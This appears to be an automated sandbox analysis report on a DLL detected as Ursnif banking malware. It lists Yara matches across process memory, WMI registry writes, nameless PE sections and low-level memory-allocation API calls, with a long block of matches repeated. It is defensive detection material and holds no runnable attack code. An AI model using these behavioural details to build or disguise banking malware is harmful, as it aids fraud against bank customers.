Source: Yara match | File source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
Source: Yara match | File source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match; File source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
Source: Yara match; File source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

PE file has nameless sections
Source: qT9Qk5aKTk.dll; Static PE information: section name:
Source: qT9Qk5aKTk.dll; Static PE information: section name:
Source: qT9Qk5aKTk.dll; Static PE information: section name:
Source: qT9Qk5aKTk.dll; Static PE information: section name:
Source: qT9Qk5aKTk.dll; Static PE information: section name:
Source: qT9Qk5aKTk.dll; Static PE information: section name:
Source: qT9Qk5aKTk.dll; Static PE information: section name:

Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: qT9Qk5aKTk.dll; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00402154
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00EC4094
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00EC97F2
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00ECB11C
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_005E2154
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_00C84094
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_00C897F2
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_00C8B11C
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 10_2_04B34094
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 10_2_04B397F2
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 10_2_04B3B11C
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 12_2_0547B11C
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 12_2_054797F2
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 12_2_05474094
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 17_2_04F44094
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 17_2_04F497F2
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 17_2_04F4B11C
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 29_2_052DB11C
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 29_2_052D97F2
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 29_2_052D4094
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 31_2_046B4094
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 31_2_046BB11C
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 31_2_046B97F2
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 31_2_046B44A2
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 31_2_046B554A
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 31_2_046B27A7
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00401D9F NtMapViewOfSection
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00401EB5 GetProcAddress, NtCreateSection, memset
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00402375 NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00EC83B7 NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00ECB341 NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00E40285 NtProtectVirtualMemory
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00E4009C NtAllocateVirtualMemory
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00E40066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_005E1D9F NtMapViewOfSection
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_005E1EB5 GetProcAddress, NtCreateSection, memset
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_005E2375 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_00C883B7 NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_00C8B341 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_00BF009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_00BF0066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_00BF0285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 5_2_0097009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 5_2_00970066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 5_2_00970285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 7_2_00CA0066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 7_2_00CA0285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 7_2_00CA009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 9_2_00C90285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 9_2_00C90066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 9_2_00C9009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 10_2_04B383B7 NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 10_2_04B3B341 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 10_2_00A80285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 10_2_00A8009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 10_2_00A80066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 12_2_054783B7 NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 12_2_0547B341 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 12_2_03370066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 12_2_0337009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 12_2_03370285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 17_2_04F483B7 NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 17_2_04F4B341 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 20_2_033B009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 20_2_033B0066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 20_2_033B0285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 24_2_00A00066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 26_2_043F009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 26_2_043F0066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 26_2_043F0285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 27_2_00BC009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 27_2_00BC0285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 27_2_00BC0066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 29_2_052D83B7 NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 29_2_052DB341 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 33_2_001E009C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 33_2_001E0066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 33_2_001E0285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 35_2_030E0066 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 35_2_030E0285 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 35_2_030E009C NtAllocateVirtualMemory
Source: qT9Qk5aKTk.dll; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qT9Qk5aKTk.dll; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\loaddll32.exe; Section loaded: @ .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: ? .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: > .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: = .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: < .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: ; .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: : .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 9 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 8 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 7 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 6 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 5 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 4 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 3 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 2 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 1 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: 0 .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: - .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: , .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: + .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: * .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: ) .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: ( .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: ' .dll
